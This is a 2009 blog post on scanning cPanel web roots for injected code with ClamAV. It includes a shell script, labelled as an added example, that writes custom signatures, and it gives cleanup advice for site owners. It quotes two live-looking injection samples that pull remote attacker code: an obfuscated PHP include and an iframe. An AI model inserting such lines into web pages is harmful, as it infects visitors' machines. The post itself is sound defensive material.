
How to do virus scan on Linux servers ?

Tags: Linux, Security, virus

Published on: April 21, 2009 by George K.


Scenario:

Do you really need to run a virus scan to keep a Linux server secure? Sometimes, yes. With the recent wave of iframe, PHP include and JavaScript injections, it seems we need to scan web pages for injected code like the samples below:

< ? php include(urldecode("%68%74%74%70%3a%2f%2f%62%75%79%34%6d%65%2e%69%6e%66%6f%2f%73%63%72%2f%31%30%2e%74%78%74")); ? >
< iframe src=http://ms.nesseseni.cn/src.js >< /iframe >

Below are a few URLs which could help you in the process:

http://www.google.com/safebrowsing/diagnostic?site=http://supportsages.com
http://www.malwaredomains.com/
http://www.malwaredomainlist.com/mdl.php – A regularly updated list.

You can install ClamAV, an open-source antivirus engine, and run a scan to make sure the website files are not affected. On a cPanel server, the command below scans the web root of every user:

clamscan -i -r --remove /home/*/public_html/

Why would I recommend ClamAV over paid antivirus products? For the obvious reason that you can edit ClamAV's rules to add more iframe detection rules: write new pattern signatures into a custom ClamAV database and you have the situation under control, at least for the iframe code those signatures match.
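The following script is an added example, not code from the original post or from the ClamAV project. It shows what "writing your own rules" looks like in practice: it hex-encodes a literal injection pattern into ClamAV's .ndb signature format (Name:TargetType:Offset:HexSignature, where target type 0 means any file and * means any offset), writes a small custom database for the two patterns quoted above, and offers a plain grep pre-check that needs no ClamAV at all. The signature names, the database path and the quarantine directory are placeholders chosen for this example. Note that the command in the post uses --remove, which deletes matching files outright; the scan function here uses --move instead, so a false positive from a home-grown signature can be restored from quarantine.

```shell
#!/bin/sh
# Added example (not part of the original post): build a custom ClamAV .ndb
# signature database from literal injection patterns and pre-check a web root.
# Signature names, /tmp/custom.ndb and the quarantine path are placeholders.

# Hex-encode a literal string the way ClamAV .ndb signatures expect
# (lowercase hex, no separators).
hex_encode() {
    printf '%s' "$1" | od -An -v -tx1 | tr -d ' \n'
}

# Emit one .ndb line:  SigName:TargetType:Offset:HexSignature
# TargetType 0 = any file type, Offset * = match anywhere in the file.
make_ndb_sig() {
    printf '%s:0:*:%s\n' "$1" "$(hex_encode "$2")"
}

# Write a custom database with signatures for the two injection patterns
# quoted in the post (the signature names are assumptions). Prints the
# number of signatures written.
write_custom_db() {
    db="$1"
    {
        make_ndb_sig 'Web.Injection.Iframe.Src'   '<iframe src=http://'
        make_ndb_sig 'Web.Injection.PhpUrldecode' 'include(urldecode("'
    } > "$db"
    wc -l < "$db" | tr -d ' '
}

# Cheap pre-check that needs no ClamAV: list files under a web root that
# contain a fixed string (-F), one path per line (-l), recursively (-r).
find_injected() {
    grep -rlF -- "$2" "$1" 2>/dev/null
}

# Real scan with the stock databases plus the custom one. Infected files are
# moved to a quarantine directory rather than deleted, so a false positive
# from a home-grown signature can be restored. Requires clamscan; not run here.
scan_webroots() {
    db="$1"; quarantine="$2"; shift 2
    mkdir -p "$quarantine"
    clamscan -i -r -d /var/lib/clamav -d "$db" --move="$quarantine" "$@"
}

# Usage on a cPanel server (not executed here):
#   write_custom_db /tmp/custom.ndb
#   find_injected /home/*/public_html '<iframe src=http://'
#   scan_webroots /tmp/custom.ndb /root/quarantine /home/*/public_html
```

Passing -d twice is what keeps the stock signatures loaded alongside the custom file; with only the custom -d, clamscan would scan with nothing but your own rules. Run find_injected first on a large web root: it is much faster than a full clamscan and gives a quick list of pages to inspect by hand.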

Another option is mod_security 2.5, which can help prevent page alteration through SQL injection and JavaScript injection, as well as the threats detailed at http://www.gnucitizen.org/blog/atom-2/

So far I have been talking about server-side security. Once a site is infected, there are a few things the client (the site owner) has to do as well.

1. Scan your own machine, as well as your webmaster's, with anti-virus and anti-spyware tools.
2. Once you are sure your computer is clean, change all site passwords. (You might want to change computer and network passwords too.)
3. Now keep the new passwords secure. Don’t use auto-upload features of your WYSIWYG editors or in your FTP browsers. Enter passwords every time you upload new content instead. Use SFTP instead of FTP if possible. Only a few hosts offer sftp though.
4. If your site was flagged by Google at http://www.google.com/safebrowsing/diagnostic , request a malware review via Webmaster Tools.
5. Regularly check your site with diagnostic tools of your choice (like Unmask Parasites) to be sure your site stays clean.

Category: Linux, Security

George K.


George started his career in web hosting and Linux technical support in the year 2004 and is with SupportSages since 2009. He has keen interest in server optimizations, custom security solutions, hacked server recovery, cyber forensic and high availability fail over system design and implementation. George loves long drives and is passionate about art and literature.
